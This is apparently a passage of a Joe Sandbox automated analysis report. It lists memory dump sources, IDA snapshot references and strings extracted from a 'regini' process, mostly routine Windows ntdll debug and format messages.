                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096333258.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3270000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %218$%8>3$/xfn$24<8$;;6x$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                  • API String ID: 0-3778452520
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 034E4742
                                                                  • Execute=1, xrefs: 034E4713
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 034E4725
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 034E4787
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034E46FC
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 034E4655
                                                                  • ExecuteOptions, xrefs: 034E46A0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  Strings
                                                                  • RTL: Re-Waiting, xrefs: 034E031E
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034E02BD
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034E02E7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 034E7B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 034E7B7F
                                                                  • RTL: Re-Waiting, xrefs: 034E7BAC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034E728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 034E72A3
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 034E7294
                                                                  • RTL: Re-Waiting, xrefs: 034E72C1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280